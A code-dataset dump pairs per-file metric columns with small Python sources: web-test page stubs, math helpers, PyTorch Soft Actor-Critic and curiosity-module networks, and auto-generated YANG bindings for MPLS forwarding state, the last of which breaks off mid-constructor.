| 21
| 1
| 21
| 21
| 0.941176
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
6b4111bb8594aec92ad547dfa0ab44540b5816ce
| 77
|
py
|
Python
|
OpenCart/pages/wish_page_list.py
|
turovod/Otus
|
57433c6944bca155177b07ff361139ff30f7f692
|
[
"MIT"
] | null | null | null |
OpenCart/pages/wish_page_list.py
|
turovod/Otus
|
57433c6944bca155177b07ff361139ff30f7f692
|
[
"MIT"
] | null | null | null |
OpenCart/pages/wish_page_list.py
|
turovod/Otus
|
57433c6944bca155177b07ff361139ff30f7f692
|
[
"MIT"
] | null | null | null |
from OpenCart.pages import BasePage
class WishListPage(BasePage):
pass
| 12.833333
| 35
| 0.779221
| 9
| 77
| 6.666667
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.168831
| 77
| 5
| 36
| 15.4
| 0.9375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
862ab6ae93fa4a412994cac39835b9722acbcc94
| 137
|
py
|
Python
|
asgi.py
|
backwardspy/randnd
|
7ab93a5374b7286dd62c3a135092f120f8d1e1f8
|
[
"MIT"
] | null | null | null |
asgi.py
|
backwardspy/randnd
|
7ab93a5374b7286dd62c3a135092f120f8d1e1f8
|
[
"MIT"
] | null | null | null |
asgi.py
|
backwardspy/randnd
|
7ab93a5374b7286dd62c3a135092f120f8d1e1f8
|
[
"MIT"
] | null | null | null |
"""
Simply exposes proxy.server.app for use in a WSGI server.
"""
from proxy.server import app # noqa, pylint: disable=unused-import
| 22.833333
| 69
| 0.722628
| 21
| 137
| 4.714286
| 0.761905
| 0.222222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.167883
| 137
| 5
| 70
| 27.4
| 0.868421
| 0.686131
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
866f3b7ae341e4d316f5350e4229e39b3db1a000
| 359
|
py
|
Python
|
instagram_api/response/model/unpredictable/__init__.py
|
Yuego/instagram_api
|
b53f72db36c505a2eb24ebac1ba8267a0cc295bb
|
[
"MIT"
] | 13
|
2019-08-07T21:24:34.000Z
|
2020-12-12T12:23:50.000Z
|
instagram_api/response/model/unpredictable/__init__.py
|
Yuego/instagram_api
|
b53f72db36c505a2eb24ebac1ba8267a0cc295bb
|
[
"MIT"
] | null | null | null |
instagram_api/response/model/unpredictable/__init__.py
|
Yuego/instagram_api
|
b53f72db36c505a2eb24ebac1ba8267a0cc295bb
|
[
"MIT"
] | null | null | null |
# TODO: realyze
from .core import CoreUnpredictableContainer
from .direct_thread_last_seen_at import DirectThreadLastSeenAtUnpredictableContainer
from .friendship_status import FriendshipStatusUnpredictableContainer
from .presence import PresenceUnpredictableContainer
from .reel import ReelUnpredictableContainer
from .user import UserUnpredictableContainer
| 44.875
| 84
| 0.902507
| 31
| 359
| 10.290323
| 0.677419
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.075209
| 359
| 7
| 85
| 51.285714
| 0.960843
| 0.036212
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
869f3cf6e4975aa0f344f1262f0831fef81a782a
| 122
|
py
|
Python
|
Algorithms/Recursion/powerOfTwo.py
|
ashirwadsangwan/Python
|
b4e570bb31783178d241b9f2a7145343d830b698
|
[
"MIT"
] | null | null | null |
Algorithms/Recursion/powerOfTwo.py
|
ashirwadsangwan/Python
|
b4e570bb31783178d241b9f2a7145343d830b698
|
[
"MIT"
] | null | null | null |
Algorithms/Recursion/powerOfTwo.py
|
ashirwadsangwan/Python
|
b4e570bb31783178d241b9f2a7145343d830b698
|
[
"MIT"
] | 1
|
2022-02-22T16:08:43.000Z
|
2022-02-22T16:08:43.000Z
|
def power_of_two(x):
if x == 1:
return True
if x < 1:
return False
return power_of_two(x / 2)
| 17.428571
| 30
| 0.532787
| 21
| 122
| 2.904762
| 0.52381
| 0.229508
| 0.327869
| 0.360656
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.039474
| 0.377049
| 122
| 6
| 31
| 20.333333
| 0.763158
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 6
|
86e90b148a99349aec965559c61ddb0b7b9a1cb4
| 327
|
py
|
Python
|
test.py
|
eliteraspberries/python-libnu
|
869945fc3f0d4c7ebbc9a4e66f3aa6700472b0f3
|
[
"0BSD"
] | null | null | null |
test.py
|
eliteraspberries/python-libnu
|
869945fc3f0d4c7ebbc9a4e66f3aa6700472b0f3
|
[
"0BSD"
] | null | null | null |
test.py
|
eliteraspberries/python-libnu
|
869945fc3f0d4c7ebbc9a4e66f3aa6700472b0f3
|
[
"0BSD"
] | null | null | null |
#!/usr/bin/env python
import numpy
def abserror(a, b):
return numpy.abs(a - b)
def relerror(a, b):
return abserror(a, b) / max(numpy.abs(a), numpy.abs(b))
def eq(a, b, e):
if type(a) == numpy.ndarray:
return all(abserror(a, b) < e)
return abserror(a, b) < e
if __name__ == '__main__':
pass
| 14.863636
| 59
| 0.584098
| 55
| 327
| 3.327273
| 0.418182
| 0.076503
| 0.218579
| 0.174863
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.244648
| 327
| 21
| 60
| 15.571429
| 0.740891
| 0.061162
| 0
| 0
| 0
| 0
| 0.026144
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.272727
| false
| 0.090909
| 0.090909
| 0.181818
| 0.727273
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 6
|
8107d530372206014a393e94e2f2af0f7d510088
| 85
|
py
|
Python
|
sandbox/src1/TCSE3-3rd-examples/src/tools/py4cs/__init__.py
|
sniemi/SamPy
|
e048756feca67197cf5f995afd7d75d8286e017b
|
[
"BSD-2-Clause"
] | 5
|
2016-05-28T14:12:28.000Z
|
2021-04-22T10:23:12.000Z
|
sandbox/src1/TCSE3-3rd-examples/src/tools/py4cs/__init__.py
|
sniemi/SamPy
|
e048756feca67197cf5f995afd7d75d8286e017b
|
[
"BSD-2-Clause"
] | null | null | null |
sandbox/src1/TCSE3-3rd-examples/src/tools/py4cs/__init__.py
|
sniemi/SamPy
|
e048756feca67197cf5f995afd7d75d8286e017b
|
[
"BSD-2-Clause"
] | 2
|
2015-07-13T10:04:10.000Z
|
2021-04-22T10:23:23.000Z
|
# load py4cs as scitools:
import scitools
import sys
sys.modules['py4cs'] = scitools
| 17
| 31
| 0.764706
| 12
| 85
| 5.416667
| 0.583333
| 0.430769
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.027397
| 0.141176
| 85
| 4
| 32
| 21.25
| 0.863014
| 0.270588
| 0
| 0
| 0
| 0
| 0.083333
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d4974695863affa2496322708e96da9d8188df9d
| 65
|
py
|
Python
|
vega/core/scheduler/__init__.py
|
qixiuai/vega
|
3e6588ea4aedb03e3594a549a97ffdb86adb88d1
|
[
"MIT"
] | 12
|
2020-12-13T08:34:24.000Z
|
2022-03-20T15:17:17.000Z
|
vega/core/scheduler/__init__.py
|
qixiuai/vega
|
3e6588ea4aedb03e3594a549a97ffdb86adb88d1
|
[
"MIT"
] | 3
|
2021-03-31T20:15:40.000Z
|
2022-02-09T23:50:46.000Z
|
built-in/TensorFlow/Research/cv/image_classification/Darts_for_TensorFlow/automl/vega/core/scheduler/__init__.py
|
Huawei-Ascend/modelzoo
|
df51ed9c1d6dbde1deef63f2a037a369f8554406
|
[
"Apache-2.0"
] | 2
|
2021-07-10T12:40:46.000Z
|
2021-12-17T07:55:15.000Z
|
from .master import Master
from .local_master import LocalMaster
| 21.666667
| 37
| 0.846154
| 9
| 65
| 6
| 0.555556
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.123077
| 65
| 2
| 38
| 32.5
| 0.947368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d4df22a20fb8738b0eb0f771c27afdbbead7db93
| 47
|
py
|
Python
|
opennem/core/facility/__init__.py
|
paulculmsee/opennem
|
9ebe4ab6d3b97bdeebc352e075bbd5c22a8ddea1
|
[
"MIT"
] | 22
|
2020-06-30T05:27:21.000Z
|
2022-02-21T12:13:51.000Z
|
opennem/core/facility/__init__.py
|
paulculmsee/opennem
|
9ebe4ab6d3b97bdeebc352e075bbd5c22a8ddea1
|
[
"MIT"
] | 71
|
2020-08-07T13:06:30.000Z
|
2022-03-15T06:44:49.000Z
|
opennem/core/facility/__init__.py
|
paulculmsee/opennem
|
9ebe4ab6d3b97bdeebc352e075bbd5c22a8ddea1
|
[
"MIT"
] | 13
|
2020-06-30T03:28:32.000Z
|
2021-12-30T08:17:16.000Z
|
from .fueltechs import parse_facility_fueltech
| 23.5
| 46
| 0.893617
| 6
| 47
| 6.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.085106
| 47
| 1
| 47
| 47
| 0.930233
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d4ed149dab3d253c1d54afcb385109e293787b98
| 13,166
|
py
|
Python
|
models/SAC_sumo_model.py
|
punk95/Continual-Learning-With-Curiosity
|
af0c507040e1352beb8740b6b3a7849417fc879a
|
[
"MIT"
] | 2
|
2021-07-12T17:11:35.000Z
|
2021-07-13T05:56:30.000Z
|
models/SAC_sumo_model.py
|
punk95/Continual-Learning-With-Curiosity
|
af0c507040e1352beb8740b6b3a7849417fc879a
|
[
"MIT"
] | null | null | null |
models/SAC_sumo_model.py
|
punk95/Continual-Learning-With-Curiosity
|
af0c507040e1352beb8740b6b3a7849417fc879a
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
import torch.nn.functional as F
from util.weight_initalizer import weight_initialize, bias_initialize
import numpy as np
from models.base import NN_Paramters, BaseNN
#for soft actor critic
LOG_SIG_MAX = 2
LOG_SIG_MIN = -20
epsilon = 1e-6
class Continuous_Gaussian_Policy_Sumo(BaseNN):
# adapted from https://github.com/pranz24/pytorch-soft-actor-critic/blob/master/model.py
def __init__(self, nn_params, save_path, load_path, action_space=None):
super(Continuous_Gaussian_Policy_Sumo, self).__init__(save_path=save_path, load_path=load_path)
self.layers = nn.ModuleList([])
self.nn_params = nn_params
self.non_lin = self.nn_params.non_linearity
self.batch_size = None
# Hidden layers
layer_input_dim = self.nn_params.state_dim
hidden_layer_dim = self.nn_params.hidden_layer_dim
for i, dim in enumerate(hidden_layer_dim):
l = nn.Linear(layer_input_dim, dim)
self.weight_init(l, self.nn_params.weight_initializer, self.nn_params.bias_initializer)
self.layers.append(l)
layer_input_dim = dim
# Final Layer
self.mean = nn.Linear(layer_input_dim, self.nn_params.action_dim)
self.weight_init(self.mean, self.nn_params.weight_initializer, self.nn_params.bias_initializer)
self.log_std = nn.Linear(layer_input_dim, self.nn_params.action_dim)
self.weight_init(self.log_std, self.nn_params.weight_initializer, self.nn_params.bias_initializer)
self.to(self.nn_params.device)
# action rescaling
if action_space is None:
self.action_scale = torch.tensor(1.).to(self.nn_params.device)
self.action_bias = torch.tensor(0.).to(self.nn_params.device)
else:
self.action_scale = torch.FloatTensor(
(action_space.high - action_space.low) / 2.).to(self.nn_params.device)
self.action_bias = torch.FloatTensor(
(action_space.high + action_space.low) / 2.).to(self.nn_params.device)
def forward(self, state):
if type(state) != torch.Tensor:
state = torch.Tensor(state).to(self.nn_params.device)
self.batch_size = state.size()[0]
if len(state.shape) == 3:
state = torch.flatten(state)
else:
state = torch.flatten(state, start_dim=1)
inp = state
for i, layer in enumerate(self.layers):
if self.non_lin != None:
inp = self.non_lin(layer(inp))
else:
inp = layer(inp)
mean = self.mean(inp)
log_std = self.log_std(inp)
log_std = torch.clamp(log_std, min=LOG_SIG_MIN, max=LOG_SIG_MAX)
return mean, log_std
def sample_with_std(self, state, format="torch"):
mean, log_std = self.forward(state=state)
std = log_std.exp()
gaussian = torch.distributions.Normal(loc=mean, scale=std)
# sample for reparametrization trick
x_t = gaussian.rsample()
y_t = torch.tanh(x_t)
action = y_t * self.action_scale + self.action_bias
log_prob = gaussian.log_prob(x_t)
# Enforcing Action Bound
log_prob -= torch.log(self.action_scale * (1 - y_t.pow(2)) + epsilon)
if len(log_prob.shape) != 1:
log_prob = log_prob.sum(1, keepdim=True)
mean = torch.tanh(mean) * self.action_scale + self.action_bias
if format == "torch":
return action, log_prob, mean, std
else:
return action.cpu().detach().numpy(), log_prob.cpu().detach().numpy(), mean.cpu().detach().numpy(), std.cpu().detach().numpy()
def sample(self, state, format="torch"):
mean , log_std = self.forward(state=state)
std = log_std.exp()
gaussian = torch.distributions.Normal(loc=mean, scale=std)
#sample for reparametrization trick
x_t = gaussian.rsample()
y_t = torch.tanh(x_t)
action = y_t * self.action_scale + self.action_bias
log_prob = gaussian.log_prob(x_t)
# Enforcing Action Bound
log_prob -= torch.log(self.action_scale * (1 - y_t.pow(2)) + epsilon)
if len(log_prob.shape) != 1:
log_prob = log_prob.sum(1, keepdim=True)
mean = torch.tanh(mean) * self.action_scale + self.action_bias
if format == "torch":
return action, log_prob, mean
else:
return action.cpu().detach().numpy(), log_prob.cpu().detach().numpy(), mean.cpu().detach().numpy()
def to(self, device):
super().to(device)
self.nn_params.device= device
class Q_Function_sumo_NN(BaseNN):
def __init__(self, nn_params, save_path, load_path):
super(Q_Function_sumo_NN, self).__init__(save_path=save_path, load_path=load_path)
self.layers = nn.ModuleList([])
self.nn_params = nn_params
self.non_lin = self.nn_params.non_linearity
# Hidden layers
layer_input_dim = self.nn_params.state_dim + self.nn_params.action_dim
hidden_layer_dim = self.nn_params.hidden_layer_dim
for i, dim in enumerate(hidden_layer_dim):
l = nn.Linear(layer_input_dim, dim)
self.weight_init(l, self.nn_params.weight_initializer, self.nn_params.bias_initializer)
self.layers.append(l)
layer_input_dim = dim
#Final Layer
self.Q_value = nn.Linear(layer_input_dim, 1)
self.weight_init(self.Q_value, self.nn_params.weight_initializer, self.nn_params.bias_initializer)
self.to(self.nn_params.device)
def forward(self, state, action):
if type(state) != torch.Tensor:
state = torch.Tensor(state).to(self.nn_params.device)
if type(action) != torch.Tensor:
action = torch.Tensor(action).to(self.nn_params.device)
if len(state.shape) == 3:
state = torch.flatten(state)
else:
state = torch.flatten(state, start_dim=1)
inp = torch.cat((state, action), dim= 1)
for i, layer in enumerate(self.layers):
if self.non_lin != None:
inp = self.non_lin(layer(inp))
else:
inp = layer(inp)
Q_s_a = self.Q_value(inp)
return Q_s_a
def get_value(self, state, action, format="torch"):
if format == "torch":
return self.forward(state, action)
elif format == "numpy":
return self.forward(state, action).cpu().detach().numpy()
def to(self, device):
super().to(device)
self.nn_params.device= device
class ICM_Next_State_sumo_NN(BaseNN):
def __init__(self, nn_params, save_path, load_path, state_action=True):
super(ICM_Next_State_sumo_NN, self).__init__(save_path=save_path, load_path=load_path)
self.layers = nn.ModuleList([])
self.nn_params = nn_params
self.non_lin = self.nn_params.non_linearity
layer_input_dim = self.nn_params.state_dim + self.nn_params.action_dim
hidden_layer_dim = self.nn_params.hidden_layer_dim
for i, dim in enumerate(hidden_layer_dim):
l = nn.Linear(layer_input_dim, dim)
self.weight_init(l, self.nn_params.weight_initializer, self.nn_params.bias_initializer)
self.layers.append(l)
layer_input_dim = dim
# Final Layer
self.next_state = nn.Linear(layer_input_dim, self.nn_params.state_dim)
self.weight_init(self.next_state, self.nn_params.weight_initializer, self.nn_params.bias_initializer)
self.to(self.nn_params.device)
def forward(self, state, action):
if type(state) != torch.Tensor:
state = torch.Tensor(state).to(self.nn_params.device)
if type(action) != torch.Tensor:
action = torch.Tensor(action).to(self.nn_params.device)
if len(state.shape) == 3:
state = torch.flatten(state)
else:
state = torch.flatten(state, start_dim=1)
if len(state.size()) == 1:
inp = torch.cat((state, action), dim=0)
else:
inp = torch.cat((state, action), dim=1)
for i, layer in enumerate(self.layers):
if self.non_lin != None:
inp = self.non_lin(layer(inp))
else:
inp = layer(inp)
next_state_pred = self.next_state(inp)
return next_state_pred
def get_next_state(self, state, action, format="torch"):
next_state = self.forward(state, action)
if format == "torch":
return next_state
else:
return next_state.cpu().detach().numpy()
def to(self, device):
super().to(device)
self.nn_params.device = device
class ICM_Action_sumo_NN(BaseNN):
def __init__(self, nn_params, save_path, load_path, state_action=True):
super(ICM_Action_sumo_NN, self).__init__(save_path=save_path, load_path=load_path)
print("cur_init")
self.layers = nn.ModuleList([])
self.nn_params = nn_params
self.non_lin = self.nn_params.non_linearity
layer_input_dim = self.nn_params.state_dim + self.nn_params.state_dim
hidden_layer_dim = self.nn_params.hidden_layer_dim
for i, dim in enumerate(hidden_layer_dim):
l = nn.Linear(layer_input_dim, dim)
self.weight_init(l, self.nn_params.weight_initializer, self.nn_params.bias_initializer)
self.layers.append(l)
layer_input_dim = dim
# Final Layer
self.action = nn.Linear(layer_input_dim, self.nn_params.action_dim)
self.weight_init(self.action, self.nn_params.weight_initializer, self.nn_params.bias_initializer)
self.to(self.nn_params.device)
def forward(self, state, next_state):
if type(state) != torch.Tensor:
state = torch.Tensor(state).to(self.nn_params.device)
if type(next_state) != torch.Tensor:
next_state = torch.Tensor(next_state).to(self.nn_params.device)
if len(state.shape) == 3:
state = torch.flatten(state)
next_state = torch.flatten(next_state)
else:
state = torch.flatten(state, start_dim=1)
next_state = torch.flatten(next_state, start_dim=1)
if len(state.size()) == 1:
inp = torch.cat((state, next_state), dim=0)
else:
inp = torch.cat((state, next_state), dim=1)
for i, layer in enumerate(self.layers):
if self.non_lin != None:
inp = self.non_lin(layer(inp))
else:
inp = layer(inp)
action_pred = self.action(inp)
return action_pred
def get_action(self, state, next_state, format="torch"):
action = self.forward(state, next_state)
if format == "torch":
return action
else:
return action.cpu().detach().numpy()
def to(self, device):
super().to(device)
self.nn_params.device = device
class ICM_Reward_sumo_NN(BaseNN):
def __init__(self, nn_params, save_path, load_path, state_action=True):
super(ICM_Reward_sumo_NN, self).__init__(save_path=save_path, load_path=load_path)
self.layers = nn.ModuleList([])
self.nn_params = nn_params
self.non_lin = self.nn_params.non_linearity
layer_input_dim = self.nn_params.state_dim + self.nn_params.action_dim
hidden_layer_dim = self.nn_params.hidden_layer_dim
for i, dim in enumerate(hidden_layer_dim):
l = nn.Linear(layer_input_dim, dim)
self.weight_init(l, self.nn_params.weight_initializer, self.nn_params.bias_initializer)
self.layers.append(l)
layer_input_dim = dim
# Final Layer
self.reward = nn.Linear(layer_input_dim, 1)
self.weight_init(self.reward, self.nn_params.weight_initializer, self.nn_params.bias_initializer)
self.to(self.nn_params.device)
def forward(self, state, action):
if type(state) != torch.Tensor:
state = torch.Tensor(state).to(self.nn_params.device)
if type(action) != torch.Tensor:
action = torch.Tensor(action).to(self.nn_params.device)
if len(state.shape) == 3:
state = torch.flatten(state)
else:
state = torch.flatten(state, start_dim=1)
if len(state.size()) == 1:
inp = torch.cat((state, action), dim=0)
else:
inp = torch.cat((state, action), dim=1)
for i, layer in enumerate(self.layers):
if self.non_lin != None:
inp = self.non_lin(layer(inp))
else:
inp = layer(inp)
pred_reward = self.reward(inp)
return pred_reward
def get_reward(self, state, action, format="torch"):
reward = self.forward(state, action)
if format == "torch":
return reward
else:
return reward.cpu().detach().numpy()
def to(self, device):
super().to(device)
self.nn_params.device = device
| 33.93299
| 138
| 0.624032
| 1,791
| 13,166
| 4.338358
| 0.07761
| 0.085457
| 0.120463
| 0.053282
| 0.854183
| 0.827799
| 0.8139
| 0.807851
| 0.796268
| 0.77323
| 0
| 0.004447
| 0.265532
| 13,166
| 388
| 139
| 33.93299
| 0.799069
| 0.024837
| 0
| 0.671642
| 0
| 0
| 0.005692
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.078358
| false
| 0
| 0.022388
| 0
| 0.182836
| 0.003731
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
be19caf7ce72c7126af2c7ad4d3b927197d2bce5
| 44,176
|
py
|
Python
|
pybind/slxos/v16r_1_00b/mpls_state/lsp/forwarding/__init__.py
|
shivharis/pybind
|
4e1c6d54b9fd722ccec25546ba2413d79ce337e6
|
[
"Apache-2.0"
] | null | null | null |
pybind/slxos/v16r_1_00b/mpls_state/lsp/forwarding/__init__.py
|
shivharis/pybind
|
4e1c6d54b9fd722ccec25546ba2413d79ce337e6
|
[
"Apache-2.0"
] | null | null | null |
pybind/slxos/v16r_1_00b/mpls_state/lsp/forwarding/__init__.py
|
shivharis/pybind
|
4e1c6d54b9fd722ccec25546ba2413d79ce337e6
|
[
"Apache-2.0"
] | 1
|
2021-11-05T22:15:42.000Z
|
2021-11-05T22:15:42.000Z
|
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
class forwarding(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-mpls-operational - based on the path /mpls-state/lsp/forwarding. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: MPLS LSP forwarding information
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__tunnel_vif_index','__lsp_id','__forwarding_up','__primary_active','__primary_up','__secondary_active','__secondary_up','__selected_secondary_active','__selected_secondary_up','__frr_active','__frr_up','__instance_id','__out_port_id','__out_port_name','__out_label',)
_yang_name = 'forwarding'
_rest_name = 'forwarding'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__selected_secondary_active = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="selected-secondary-active", rest_name="selected-secondary-active", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
self.__tunnel_vif_index = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tunnel-vif-index", rest_name="tunnel-vif-index", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
self.__secondary_active = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secondary-active", rest_name="secondary-active", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
self.__out_port_id = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="out-port-id", rest_name="out-port-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
self.__selected_secondary_up = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="selected-secondary-up", rest_name="selected-secondary-up", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
self.__out_label = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="out-label", rest_name="out-label", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
self.__forwarding_up = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="forwarding-up", rest_name="forwarding-up", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
self.__instance_id = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="instance-id", rest_name="instance-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
self.__primary_active = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="primary-active", rest_name="primary-active", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
self.__out_port_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="out-port-name", rest_name="out-port-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
